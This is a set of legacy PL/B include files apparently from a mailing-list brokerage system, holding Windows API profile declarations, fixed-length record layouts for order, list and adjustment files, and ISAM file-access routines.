. 1. kernel32 - This defines a basic Window's DLL module to use.
.
. 2. GetWindowsDirectoryA
. - This defines the API function name to be executed
. by a WINAPI statement when using this PROFILE.
. You will note that the character 'A' has been
. appended to the function name. This is required
. by Windows to identify the format of string data
. used in the parameter list. In this case, the
. DIM parameter in the parameter list will have
. an ASCII string terminated with a binary zero
. placed into it by the API function.
.
. 3. INT4 - The third operand defines the type of variable
. to be used for a RETURN value. In this case we
. are only requesting a 32 bit value be returned.
.
. 0 - Function failed.
. nn - The return value is the length of the
. string placed into the DIM variable not
. including the NULL character which was
. also stored.
.
. 4. DIM - The fourth operand defines the type of variable
. to be used for the first variable in the parameter
. list. In this case the API function will store
. the name of the Windows directory with a NULL
. character as the terminator.
.
. 5. PINT4 - The fifth operand defines the type of variable
. to be used for the second variable in the API
. function parameter list. In this case the PINT4
. indicates that the function call expects a pointer
. to the actual value is to be passed to the API
. function. For this function, the value of this
. variables defines how big the output buffer is.
.
GetName PROFILE kernel32, GetWindowsDirectoryA, INT4, DIM, PINT4
.
*---GetPrivateProfileString----------------------------------------------------
.
. In this case the 'GetPPStr' PROFILE defines a function which will allow
. the KEYWORD string data from a '.INI' file to be retrieved. The parameters
. are defined as follows.
.
. Profile for kernel32!GetPrivateProfileStringA — reads a keyword value from
. a Windows .INI file; continuation lines carry one parameter type each.
GetPPStr PROFILE kernel32: ;DLL name
                 GetPrivateProfileStringA: ;API name
                 INT2:                     ;16 bit return value
                 DIM:                      ;Application name in init. file
                 DIM:                      ;Keyword name
                 DIM:                      ;Default if not found
                 DIM:                      ;Return buffer
                 INT2:                     ;Maximum return buffer size
                 DIM                       ;Name of initialization file
.
*---GetCursorPos---------------------------------------------------------------
.
. The 'GetCurse' PROFILE defines a function which allows the current absolute
. mouse cursor coordinates to be retrieved. This function has a single
. parameter used which is a Windows structure named POINT. The structure
. POINT contains two members which define the x and y coordinates of the
. mouse cursor. There this PROFILE defines that the function parameter is
. a DIM which causes the user dim variable address to be passed to the
. 'GetCursorPos'. When this function is completed, the user dim variable
. will contain the POINT structure member data. This is a sample of how
. a structure can be used with WINAPI functions.
.
. Profile for user32!GetCursorPos — the single DIM parameter receives the
. Windows POINT structure (x,y) as raw bytes; see discussion above.
GetCurse PROFILE user32: ;DLL name
                 GetCursorPos: ;API name
                 INT4:         ;32 bit return value
                 DIM           ;DIM value to be used for structure
                               ; member data.  After a call to this
                               ; function a user can unpack the
                               ; DIM data into 2 integer variables
                               ; to get the coordinates of mouse.
.
*---FindFirstFile--------------------------------------------------------------
.
.        The 'FindFirstFile' function finds the first occurrence of a file specified
.        by the Filename parameter.  The file properties are placed into the
. second parameter which is a FileData Structure.
.
. Profile for kernel32!FindFirstFileA — returns a search handle (INT4);
. the second DIM receives the WIN32_FIND_DATA structure bytes.
FindFirst PROFILE kernel32: ;DLL name
                  FindFirstFileA: ;API name ( ASCIIZ string format )
                  INT4: ;File Handle return value
                  DIM:  ;Search File Name ( ASCIIZ required )
                  DIM   ;FileData structure
.
*---FindNextFile---------------------------------------------------------------
.
.        The 'FindNextFile' function finds the next occurrence of a file after a
. 'FindFirstFile' has succeeded. The return value will be non-zero when
. 'FindNextFile' locates another file. The return value will be zero
. when no more files are found. When a file is found, the second parameter
. will contain the FileData structure information for the file found.
. The first parameter of the function is the File Handle value returned
. from a successful 'FindFirstFile' operation.
.
FindNext PROFILE kernel32, FindNextFileA, INT1, INT4, DIM
.
*---FindClose------------------------------------------------------------------
.
. The 'FindClose' function closes the File Handle returned from a
. successful 'FindFirstFile' function.
.
FindClose PROFILE kernel32, FindClose, INT1, INT4
.
*------------------------------------------------------------------------------
<file_sep>/include/integralbak.inc
FILE SPECS
*******************************************
***************LRFile.dat******************
*******************************************
(Note: These are identical to file specs previously provided,)
(with the exception of the Exchange History, which will now be)
(provided in a separate file. I have used this space to store)
(the Broker Company Name.)
Order Code 1 Text
Order Status 1 Text “0”=Live, “B”=Billed, “Q”=Cancelled Billed, “X”=Cancelled, “l”=LCR, “z”=Cancelled LCR, “p”=Pending, “x”=Cancelled Pending
Mailer Number 4 Numeric
LR Number (Key) 6 Numeric
Mailer Contact Number 3 Numeric Obsolete
List Number 6 Numeric
List Owner Number 4 Numeric
Mailer Purchase Order Number 12 Text
Order Quantity 9 Numeric
*Price Per Thousand 5 Numeric
Mailer Key 12 Text
Media Code 2 Numeric
Return Date 8 Numeric
Mail Date 8 Numeric
Order Test Code 1 Numeric
Selection on Test Code 1 Numeric
Continuation Code 1 Numeric
Continuation LR Number 6 Numeric
Order Date of Continuation LR 8 Numeric
Qty of Continuation LR 9 Numeric
Spec. Instruction Codes 24 Numeric Obsolete
Bill Direct Code 1 Numeric
Broker Guarantee Code 1 Numeric
Entire/Rent/Exchange Code 1 Numeric “1”=Entire, “2”=Exchange, “3”=Entire & Exchange
Offer Number 7 Numeric first 4 bytes are Obsolete
Offer Description 5 Text Obsolete
Order Net Quantity 9 Numeric
Order Campaign Number 6 Numeric
Clearance Status 1 Numeric
Clearance Initials 3 Text
Broker Notification Byte 1 Numeric Used only by List Management
Clearance Date 8 Numeric
LCR Rental Request Byte 1 Numeric
LCR History Byte 1 Text
*Exchange Price per Thousand 5 Numeric
Return To Company Number 4 Numeric
Tape Return Byte 1 Numeric Obsolete
List/Select Universe 9 Numeric
Salesperson Code 2 Numeric
NINCA Contact Code 2 Numeric
NINCA Caller Code 2 Numeric
Order Date 8 Numeric
Sample Code 1 Numeric
Comselect Code 1 Numeric
Shipping Method Code 2 Numeric
List Name 35 Text
Select Name 35 Text
ReUse LR Number 6 Numeric
Typist Initials 3 Text
Order Exchange Quantity 9 Numeric
NINCA Guarantee Code 1 Numeric
Broker Number 4 Numeric
Broker Contact Number 3 Numeric
Sample Number 3 Numeric
Net Name Percentage 2 Numeric
Net name Running Charge 3.2 Numeric (total of 6 bytes)
Net Flag 1 Numeric
Net Name Minimum 7 Numeric
Filler 80 Text
Mailer Name 45 Text
Owner Name 25 Text
Offer Name 45 Text
Broker Name 45 Text
Merge Percentage 10 Numeric Merge % Percentage for this LR
Datacard Exc/Rent Limitations 1 Numeric “1”=Rent or Exchange, “2”=Exchange Only, “3”=Rental Only
Datacard Revision Date 10 Text Formatted as MM/DD/CCYY
Last Merge % for Mlr/List 6 Numeric Merge % for LR with this Mlr/List with latest Order Date
LCR/Pending Order SubStatus Desc. 45 Text Will remain blank until LCRs/Pending Orders are sent to Integral
Gross Billed Quantity 8 Numeric
Net Merge Quantity 8 Numeric
Total Billed (AR) 10.2 Numeric (total of 13 bytes)
Base Price 5.2 Numeric
Select Price 5.2 Numeric If applicable
Price Calculator 20 Text "/m", "Flat", etc.
Select Number 4 Numeric Valid Number OR "XXXX" = keyed in Select OR "----" = Order placed before new Datacard logic
Select Name 75 Text
*********************************************
***************ListFile.dat******************
*********************************************
List Number(Key) 6 Numeric
List Name 75 Text
Status 1 Text "W"=Withdrawn, "T"=Temporarily Withdrawn
Universe 9 Numeric
*********************************************
***************BaseFile.dat******************
*********************************************
(Note: The Base Text should be pretty solid. However, there MAY)
(be lines that contain garbage. We are working with standards, when)
(extracting the data, which MAY not have been followed for the Old/Inactive Lists.)
(The only bad Base Text fields that I found were all attached to Inactive Lists.)
List Number(Key) 6 Numeric
Base Number(Key) 2 Numeric
Base Code 4 Text "BASE"=Base, "SEC."=Secondary Base
Base Text 46 Text May Include: Name, Universe, Price
*********************************************
***************SelFile.dat******************
*********************************************
List Number(Key) 6 Numeric
Select Number (Key) 4 Unique Numeric Identifier
Select Name 75 Text
Select Quantity 10 Numeric
Select Price 5.2 Numeric (Total of 8 bytes)
If the record is a Base/Secondary Base or unassociated Select,
this field represents the total Select Price. If the record
does have an associated Base/Secondary Base, this field would need
to be added to the Select Price of the associated Base/Secondary Base
in order to achieve the correct total. It was done this way to allow
different print options.
Commission Flag 1 Numeric
Price Modifier 3 Numeric
Inactive Flag 1 Numeric '1' = Inactive Select
Select Status 1 Numeric '1' = Special (does not print), '2' = Office Use Only
Notes Flag 1 Numeric '1' = User should view Notes field in corresponding Datacard
Exchange Flag				1	Numeric		' ' or '0' = Exchange or Rent, '1' = Exchange Only, '2' = Rental Only
Base Association 4 Text 'BASE' = Base Select - 1 per Datacard
'SEC.' = Secondary Base Select - 0+ per Datacard
A 4 byte Numeric field in this location establishes this record as a Select
off of a Base/Secondary Base. That 4 byte number would be the corresponding
Select Number of a Base/Secondary Base record.
There is the possibility of no data in this location. This would pertain to a Select
that is independent of an associated Base/Secondary Base, but is not a Base/Secondary Base
itself.
Index Flag 4 Numeric Established Print/Display order of Select Records for a Datacard
Select Date 8 Numeric
Initials 3 Text
Filler 11 Text
********************************************
***************PkgFile.dat******************
********************************************
(The following fields are mutually exclusive: )
(Master Package Indicator)
(Master Package Association Number)
(Note on Master Packages: A Master Package will have an Indicator value of "1",)
(and the Association Number will be cleared. Regular Packages may have a valid)
(Master Package Number in the Association Number field.)
Mailer Number(Key) 4 Numeric
Package Number(Key) 6 Numeric
Package Name 150 Text
Client Package ID 25 Text
Package Date 8 Numeric
Package Notes 500 Text
Master Package Indicator 1 Numeric
Master Package Association Number 6 Numeric
Filler 93 Text
*********************************************
***************PkgPFile.dat******************
*********************************************
Mailer Number(Key) 4 Numeric
Package Number(Key) 6 Numeric
Price Date(Key) 8 Numeric
Package Print Price 6.2 Numeric (total of 9 bytes)
Package Postage Price 6.2 Numeric (total of 9 bytes)
Package Premium Price 6.2 Numeric (total of 9 bytes)
Package Total Price 8.2 Numeric (total of 9 bytes)
Price Notes 200 Text
Filler 100 Text
*********************************************
***************XRefFile.dat******************
*********************************************
List Number(Key) 6 Numeric
Mailer Number(Key) 4 Numeric
*********************************************
***************ExchFile.dat******************
*********************************************
(Note on Inactivated Date: This field will USUALLY contain valid data)
(if the Flag has a value of "I". Otherwise do not be surprised to find garbage)
(in this field!)
Mailer1 Number(Key) 4 Numeric
Mailer2 Number(Key) 4 Numeric
Inactivated Date 8 Text** See Notes
Entry Number 5 Numeric
Flag 1 Text " "=normal, "I" = inactive
Mailer1 Usage 10 Numeric
Mailer2 Usage 10 Numeric
*********************************************
***************SamFile.dat******************
*********************************************
Mailer Number 4 Numeric
Sample Number 3 Numeric
Sample Description 30 Text
Sample Description 2 30 Text
Sample Date 8 Numeric
Record Date 8 Numeric
User Name 9 Text
Inactive Code 1 Numeric "1" = Sample is Inactive
*********************************************
***************OffFile.dat******************
*********************************************
Offer code 1 Text (Obsolete)
Mailer Number 4 Numeric
Offer Number 3 Numeric
Offer Description 40 Text
User Name 10 Text
Record Date 8 Numeric
*********************************************
***************ConFile.dat******************
*********************************************
Contact Number 2 Numeric
Contact Name 35 Text
Contact Phone Number 25 Text
Contact Port Number 3 Numeric
Team Number 2 Numeric (Not implemented)
Rights 1 Numeric (Not implemented)
Rights 2 40 Numeric (Not implemented)
Default Printer 1 Numeric
Caller/Planner 1 Numeric
*********************************************
***************MedFile.dat******************
*********************************************
Media Number 2 Numeric
Media Name 50 Text
*********************************************
***************ShipFile.dat******************
*********************************************
Shipping Number 2 Numeric
Shipping Description 35 Text
*********************************************
***************TxtFile.dat******************
*********************************************
(Unique identifier starts at '1', allowing up to nine 500 byte records of Free Text per Datacard.)
Datacard Number 6 Numeric
Text Number 1 Numeric
Text 500 Text
*********************************************
***************PrcFile.dat******************
*********************************************
(Additional Prices associated with an Order)
LR Number (Key) 6 Numeric
Additional Price Amount 5.2 Numeric
Additional Price Text 46 Text
Additional Price Calculator 20 Text<file_sep>/include/NSLSDD.inc
.; Last change: BC 27 Jan 2003 7:24 am
.* *****************************************************************************
.* NAMES IN THE NEWS MASTER EOM SALES FILE.
.* *****************************************************************************
.
. FILE: NINSLS
. LENGTH: 163
.COMPRESS:
. TYPE: SEQ
. KEY: NONE
.revised 24Sep07 PLI Patch 1.3
.revised 27APr99 DLH NININV Y2k patch 1.2
. REVISED 20JAN99 ASH NINORD Y2K, File expansion Patch #1.1
.revised 10mar95 dlh added adjust flag
. REVISED 17FEB95 ADDED CHECK DATE/MCOMP .
. REVISED 19APR93 ADDED OUTSIDE GUAR CODE BYTE 15, TAKEN FROM ORDER
. 02nov93 added a/r for new list manag statement
...............................................................................
.
. File handles and record layout for the EOM sales extract (see header above).
. Offsets reflect patches 1.1-1.3; superseded definitions are kept commented.
NSLSFILE FILE
NSLSFLE2 IFILE KEYLEN=4
NSLSNAME INIT "NINSLS|NINS1:502 "
nslsfld dim 4
NSLSFLAG FORM 1 nonzero once the file has been opened
NSLSPATH FORM 1
.
SLSvars list
SLSMLR FORM 4 1-4 MAILER NUMBER. NIN
.begin patch 1.3 PLI COnversion
.SLSLR FORM 6 5-10 LIST RENTAL NUMBER. NIN
SLSLR Dim 6 5-10 LIST RENTAL NUMBER. NIN
.end patch 1.3 PLI COnversion
SLSOWN FORM 4 11-14 LIST OWNER NUMBER. NIN
SLSGUAR1 DIM 1 15-15 OUTSIDE GUARANTY NIN
SLSCNT DIM 3 16-18 BROKER NUMBER. NIN
.SLSCNT FORM 3 16-18 BROKER NUMBER. NIN
.SLSLIST FORM 6 19-24 LIST NUMBER. NIN
SLSLIST FORM 6 19-24 LIST NUMBER. NIN
.Start Patch #1.1 - increased var
.SLSMDTE FORM 6 25-30 MAIL DATE. NIN
.SLSAP1 FORM 7 33-39 ACCOUNT PAYABLE ONE. NIN
SLSMDTE FORM 8 25-32 MAIL DATE (CCYYMMDD) NIN
.start patch 1.2
.SLSAP1 FORM 9 33-41 ACCOUNT PAYABLE ONE. NIN
SLSAP1 FORM 10.2 33-45 ACCOUNT PAYABLE ONE. NIN
.end patch 1.2
.End Patch #1.1 - increased var
SLSDJCD DIM 1 46-46 DOW JONES CODE. NIN
SLSADJCD DIM 1 47-47 ADJUSTMENT CODE. NIN
.Start Patch #1.1 - increased var
.SLSIDTE FORM 6 44-48 INVOICE DATE. NIN
SLSIDTE FORM 8 48-55 INVOICE DATE (CCYYMMDD) NIN
.END Patch #1.1 - increased var
.begin patch 1.2
.SLSAP2 FORM 9 52-60 ACCOUNTS PAYABLE TWO. NIN
SLSAP2 FORM 10.2 56-68 ACCOUNTS PAYABLE TWO. NIN
.end patch 1.2
SLSLST1 DIM 35 69-103 LIST DESCRIPTION ONE. NIN
SLSCODE DIM 1 104-104 CREDIT/DEBIT CODE,'C or D'NIN
SLSGUAR DIM 1 105-105 GUARANTY CODE. NIN
.Start Patch #1.1 - increased var
.slsAR DIM 8 94-101 A/R (NO DECIMAL)
.begin patch 1.2
.slsAR DIM 9 98-106 A/R (NO DECIMAL)
slsAR form 10.2 106-118 A/R (10.2 since patch 1.2; "(NO DECIMAL)" no longer applies)
.end patch 1.2
.End Patch #1.1 - increased var
.begin patch 1.2
.SLSCHKDTE DIM 6 107-112 INV CHECK DATE
SLSCHKDTE DIM 8 119-126 INV CHECK DATE ccyymmdd
.end patch 1.2
SLSCNAME DIM 25 127-151 CLIENT NAME
slsadjsw form 2 152-153 adjustment switch 2-adjusted
slsxchrg form 7.2 154-163 exchange charge
listend
. .............................................................................
.
LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
.NEOM0013
LISTON
<file_sep>/include/statnio.inc
..............................................................................
.
. statnio INCLUSION
. Stats FILE DEFINITION
.
. FILE NAME : nstatnote
. REC LENGTH: 212 FIXED
. INDEX KEY :
..............................................................................
.
..............................................................................
.
. ENTRY POINT : statnKEY
. REQUIRED : 'statnFLD'
. RETURNED : STAT NOTES RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
statnKEY branch statnflag to statn1
	CALL statnOPEN
statn1
	trap IOMssg giving Error if IO
. Dispatch on lock mode: 1 = FILEPI interlock, 2 = READLK record lock,
. 3 = plain READ with no locking.  Caller tests the I/O flags afterwards.
	branch statnlock to statn1L,statn1R,statn1N
statn1L	FILEPI 1;statnFILE
	READ statnFILE,statnFLD;statnVARS
	trapclr IO
	RETURN
statn1R
	READLK statnFILE,statnFLD;statnVARS
	trapclr IO
	RETURN
statn1N
	READ statnFILE,statnFLD;statnVARS
	trapclr IO
	RETURN
..............................................................................
.
. ENTRY POINT : statnTST
. REQUIRED :
. RETURNED :
. DESCRIPTION : TEST KEY
.
statnTST branch statnflag to statn2
	CALL statnOPEN
. Key-existence probe: READ into no variables (";;"); caller tests I/O flags.
statn2	FILEPI 1;statnFILE
	READ statnFILE,statnFLD;;
	RETURN
..............................................................................
.
. ENTRY POINT : statnKS
. REQUIRED :
. RETURNED : STATS NOTES RECORD
. DESCRIPTION : KEY SEQUENTIAL STATS NOTES FILE READ
.
statnKs branch statnflag to statn3
	CALL statnOPEN
. Key-sequential read: next record in key order under FILEPI interlock.
statn3	FILEPI 1;statnFILE
	READKS statnFILE;statnVARS
	RETURN
..............................................................................
.
. ENTRY POINT : statnSEQ
. REQUIRED :
. RETURNED : STATS NOTES RECORD
. DESCRIPTION : SEQUENTIAL STATS NOTES FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
statnSEQ BRANCH statnflag TO statn4
	CALL statnOPEN
. Physical-sequential read; caller is responsible for testing the I/O flags.
statn4	FILEPI 1;statnFILE
	READ statnFILE,SEQ;statnVARS
	RETURN
..............................................................................
.
. ENTRY POINT : statnWRT
. REQUIRED :
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
. Insert statnVARS as a new record, opening the file on first use and taking
. the FILEPI interlock around the WRITE, as the sibling entry points do.
. FIX: was "BRANCH statnflag OF statn5" — every other entry point in this
. include (statnKEY..statnDEL, statnUPD) uses "BRANCH flag TO label";
. normalized to TO for consistency.
statnWRT BRANCH statnflag TO statn5
	CALL statnOPEN
statn5
	FILEPI 1;statnFLst
	WRITE statnFlst;statnVARS
	RETURN
..............................................................................
.
. ENTRY POINT : statnUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE STATS NOTES FILE
.
statnUPD
. Rewrite the record addressed by a previous key READ, under FILEPI interlock.
	BRANCH statnflag TO statn6
	CALL statnOPEN
statn6
	FILEPI 1;statnFlst
	UPDATE statnFlst;statnVARS
	RETURN
..............................................................................
.
. ENTRY POINT : statnDEL
. REQUIRED : 'MKEY'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
statnDEL BRANCH statnflag TO statn7
	CALL statnOPEN
. Delete the currently addressed record, under FILEPI interlock.
statn7
	FILEPI 1;statnFlst
	DELETE statnFLst
	RETURN
..............................................................................
.
. ENTRY POINT : statnOPEN
. REQUIRED : 'statnflag'
.	RETURNED    : 'statnflag' SET TO '1' IF OPENED
. DESCRIPTION : OPEN NIN STATS NOTES FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
statnOPEN
. Open the stats-notes file list; on I/O failure control goes to statnGONE.
	TRAP statnGONE giving error IF IO
	OPEN statnFlst
	TRAPCLR IO
. Mark open so the other entry points skip the OPEN from now on.
	MOVE C1 TO statnflag
	RETURN
.
statnGONE
. Report the unavailable file through the shared FILEGONE handler (aborts).
	MOVE statnNAME TO FILENAME
	CALL FILEGONE
.
..............................................................................
.END OF INCLUDE
<file_sep>/include/NRCHGDD.INC
.
. Last change: DMB 14 Aug 2001 8:45 pm Turning Live
. DMB 17 Jul 2001 10:53 pm
..............................................................................
.
. NRCHGDD INCLUSION
.
. FILE NAME : EXCHARGE.DAT
. REC LENGTH: 66
. INDEX KEY: 1-6 LR
..............................................................................
.
NRCHGFLE FILE
EXCHARGE IFILE KEYLEN=6,FIXED=66,DUP,"Name=Excharge|NINS1:502"
EXPRINT IFILE KEYLEN=20,STATIC=5
.NRCHGNAME INIT "DBTEST"
NRCHGNAME INIT "EXCHARGE|NINS1:502"
NRCHGFLD DIM 6
NRCHGFLAG FORM 1
NRCHGFLG2 FORM 1
NRCHGlock form 1 0 or 1 = filepi, 2 = record locking, 3 = no locks ("3" presumed; digit missing in original comment)
..............................................................................
. Record layout, 66 bytes fixed, keyed on LR number (bytes 1-6).
NRCHGVARS list
NRCHGLR DIM 6 (INDEX KEY)= 1-6
NRCHGMLR DIM 4 7-10 MAILER NUMBER (was mistyped "MALIER NAME")
NRCHGMLRCNT DIM 3 11-13 MAILER/CONTACT NUMBER
NRCHGLN DIM 6 14-19 LIST NUMBER
NRCHGOWNER DIM 4 20-23 OWNER NUMBER
NRCHGTPI DIM 6 24-29 TRIPLEX INVOICE #
NRCHGQTY FORM 9 30-38 QUANTITY
NRCHGAR FORM 8.2 39-49 A/R
NRCHGAP FORM 8.2 50-60 A/P
NRCHGCE DIM 2 61-62 century (CC) — presumed from CE/YR/MO naming; verify
NRCHGYR DIM 2 63-64 year (YY) — offset corrected from duplicated "65-66"; verify against file layout
NRCHGMO DIM 2 65-66 month (MM)
listend
<file_sep>/include/MDCMainIO.inc
..............................................................................
.******************************************************
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_MAIN
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: Isam & AAM
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Secondary FIles See
.MDCSEGADD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDC035DD - CAtegory
.MDC091DD - MDC Main???? data no supplied
.MDC090DD - Owner
.MDCTXTDD - Text
...............................................
. ENTRY POINT : MInKEY
. REQUIRED : 'MInFLD'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
MInKEY	BRANCH MInFlag TO MIn1
	CALL MInOPEN
. Exact ISAM key read under FILEPI interlock; caller tests the I/O flags.
MIn1	FILEPI 1;MInFile
	READ MInFile,MInFLD;MinMainVARS
	RETURN
..............................................................................
.
. ENTRY POINT : MInTST
. REQUIRED : MInFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
MInTST	BRANCH MInFlag TO MIn2
	CALL MInOPEN
. Key-existence probe: reads into STR1 only; caller tests the I/O flags.
MIn2	FILEPI 1;MInFile
	READ MInFile,MInFLD;STR1
	RETURN
..............................................................................
.
. ENTRY POINT : MInKS
. REQUIRED :
. RETURNED : Min Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
MInKS	BRANCH MInFlag TO MIn3
	CALL MInOPEN
. Key-sequential read: next record in key order under FILEPI interlock.
MIn3	FILEPI 1;MInFile
	READKS MInFile;MinMainVARS
	RETURN
..............................................................................
. ENTRY POINT : MInSEQ
. REQUIRED :
. RETURNED : Min Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
MInSEQ	BRANCH MInFlag TO MIn4
	CALL MInOPEN
. Physical-sequential read; caller is responsible for testing the I/O flags.
MIn4	FILEPI 1;MInFile
	READ MInFile,SEQ;MinMainVARS
	RETURN
..............................................................................
.
. ENTRY POINT : MInWRT
. REQUIRED : 'MInFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
MInWRT	BRANCH MInFlag TO MIn5
	CALL MInOPEN
. NOTE(review): the interlock is taken on MInFile but the WRITE targets
. MinFlist — verify the FILEPI covers the list (cf. statnWRT, which locks
. the same object it writes).
MIn5	FILEPI 1;MInFile
	WRITE MinFlist;MinMainVARS
	RETURN
..............................................................................
.
. ENTRY POINT : MInUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
MInUPD	BRANCH MInFlag TO MIn6
	CALL MInOPEN
MIn6
.	FILEPI 1;MInFile
.	UPDATE MInFile;MinMainVARS
. NOTE(review): the FILEPI above is commented out, so this UPDATE runs with
. no interlock unlike MInWRT/MInDEL — confirm that is intentional.
	UPDATE MinFlist;MinMainVARS
	RETURN
..............................................................................
.
. ENTRY POINT : MInDEL
. REQUIRED : 'MInFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
MInDEL	BRANCH MInFlag TO MIn7
	CALL MInOPEN
. Delete the currently addressed record; earlier keyed form kept commented.
MIn7	FILEPI 1;MInFile
	DELETE MinFlist
.	DELETE MInFile,MInFLD
	RETURN
..............................................................................
.
. ENTRY POINT : MInAIM
. REQUIRED : MInFLD2
. RETURNED : Min Main Record
. DESCRIPTION : AIM MDC MainFILE READ
. APPLICA TION'S RESPONSIBILITY TO TEST FLGS
.
MInAIM BRANCH MInFlag TO MIn8
CALL MInOpen
MIn8 FILEPI 1;MInFile2
READ MInFile2,MInFLD2;MinMainVARS
RETURN
..............................................................................
.
. ENTRY POINT : MInKG
. REQUIRED : VALID PREVIOUS AIM READ
. RETURNED : Min Main Record
. DESCRIPTION : AIM KEY GENEREIC MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
MInKG BRANCH MInFlag TO MIn10
CALL MInOpen
MIn10 FILEPI 1;MInFile2
READKG MInFile2;MinMainVARS
RETURN
..............................................................................
.
. ENTRY POINT : MInKGP
. REQUIRED : PREVIOUS VALID AIM READ
. RETURNED : Min Main Record
. DESCRIPTION : KEY GENERIC PRIOR MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
MInKGP BRANCH MInFlag TO MIn11
CALL MInOpen
MIn11 FILEPI 1;MInFile2
READKGP MInFile2;MinMainVARS
RETURN
...............................................................................
.
. ENTRY POINT : MInOPEN
. REQUIRED : 'MInFlag' 'MInPATH'
. RETURNED : 'MInFlag' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
MInOPEN TRAP MInGONE giving error IF IO
OPEN MinFlist
TRAPCLR IO
MOVE C1 TO MInFlag
RETURN
..............................................................................
MInGONE MOVE MInNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/DEVELOP/Includes - why/Nadjdd.inc
..............................................................................
.
. NADJDD INCLUSION
. NIN ADJUSTMENT FILE DEFINITION
.
. FILE NAME : NINADJ
. REC LENGTH: 173 FIXED (was 151 before patch 1.3 - see NADJFILE below)
. INDEX KEY : 7-12 (LR#)
.
.patch 1.3 2007 September 14 DLH - PLI
.patch 1.2 2005 June 18 DMB - Changed IP of File Manager
.patch 1.1 y2k elim MP var list etc
..............................................................................
.
.begin patch 1.1
.NADJFILE IFILE KEYLEN=6,FIXED=90
.begin patch 1.3
.NADJFILE IFILE KEYLEN=6,FIXED=151
NADJFILE IFILE KEYLEN=6,FIXED=173
.begin patch 1.3
.end patch 1.1
.NADJNAME INIT "NINADJ "
.>Patch 1.2 Begin
.NADJNAME INIT "NINADJ.ISI|20.20.30.103:502 "
NADJNAME INIT "NINADJ.ISI|NINS1:502 "
.>Patch 1.2 End
NADJFLD DIM 6 key work area (LR number, positions 7-12 of record)
NADJFLAG FORM 1 non-zero once the file has been opened
.
. Adjustment record layout. The position ranges in the comments below
. are documentation only; actual offsets derive from the LIST order.
adjvars list
ASCODE DIM 1 1-1 'J'
ASTATUS DIM 1 2-2 '0' OR 'P'
ASMLRNUM DIM 4 3-6 MAILER NUMBER FROM INVOICE RECORD.
ASLRNUM DIM 6 7-12 LR NUMBER - KEY.
ASRECADJ form 10.2 13-25 ACCOUNTS RECEIVABLE ADJUSTMENT.
ASPAYAD1 form 10.2 26-38 ACCOUNTS PAYABLE 1 ADJUSTMENT.
ASPAYAD2 form 10.2 39-51 ACCOUNTS PAYABLE 2 ADJUSTMENT.
ASPAYAD3 form 10.2 52-64 ACCOUNTS PAYABLE 3 ADJUSTMENT. inter company
ASLRINC form 10.2 65-77 LIST RENTAL INCOME ADJUSTMENT.
ASNININC form 10.2 78-90 Non comm INCOME ADJUSTMENT.
ASREUSE DIM 1 91-91 RE-USE/RUN CHARGE CODE (1-4).
ASCRDB DIM 1 92-92 CREDIT OR DEBIT CODE (C OR D).
ASADD DIM 1 93-93 CORRECTION OR ADDITIONAL BILL CODE (1 OR 2).
ASSTAX form 5.2 94-101 STATE TAX ADJUSTMENT.
ASPOST form 5.2 102-109 POSTAGE ADJUSTMENT.
ASCITY form 5.2 110-117 CITY TAX ADJUSTMENT.
ASCNTCT DIM 3 118-120 CONTACT/BROKER CODE.
ASINVNO DIM 6 121-126 INVOICE NUMBER.
ASCRDTE DIM 8 127-134 CREDIT DATE CCYYMMDD
ASINDTE DIM 8 135-142 FROM INVOICE RECORD CCYYMMDD
ASAMNUM DIM 2 143-144 INVOICE AMENDMENT NUMBER.
ASTAT DIM 1 145-145 INVOICE STATUS FROM INVOICE RECORD.
.begin patch 1.3
.ASBLANK6 DIM 6 146-151 NOT USED
ASXNINC form 10.2 146-158 Non comm INCOME ADJUSTMENT. inter company
ASBLANK DIM 15 159-173 NOT USED
.end patch 1.3
listend
.ASCODE DIM 1 1-1 'J'
.ASTATUS DIM 1 2-2 '0' OR 'P'
..begin patch 1.1
.ASMLRNUM DIM 4 3-6 MAILER NUMBER FROM INVOICE RECORD.
.ASLRNUM DIM 6 7-12 LR NUMBER - KEY.
..ASBILLTO DIM 1 13-13 BILL-TO CODE (0-9).
..ASPAYTO DIM 1 14-14 PAY-TO CODE (0-9).
..ASRECADJ DIM 7 15-21 ACCOUNTS RECEIVABLE ADJUSTMENT.
..ASPAYAD1 DIM 7 22-28 ACCOUNTS PAYABLE 1 ADJUSTMENT.
..ASPAYAD2 DIM 7 29-35 ACCOUNTS PAYABLE 2 ADJUSTMENT.
..ASBLANK1 DIM 1 36-36 NOT USED.
..ASLRINC DIM 6 37-42 LIST RENTAL INCOME ADJUSTMENT.
.ASRECADJ form 10.2 13-25 ACCOUNTS RECEIVABLE ADJUSTMENT.
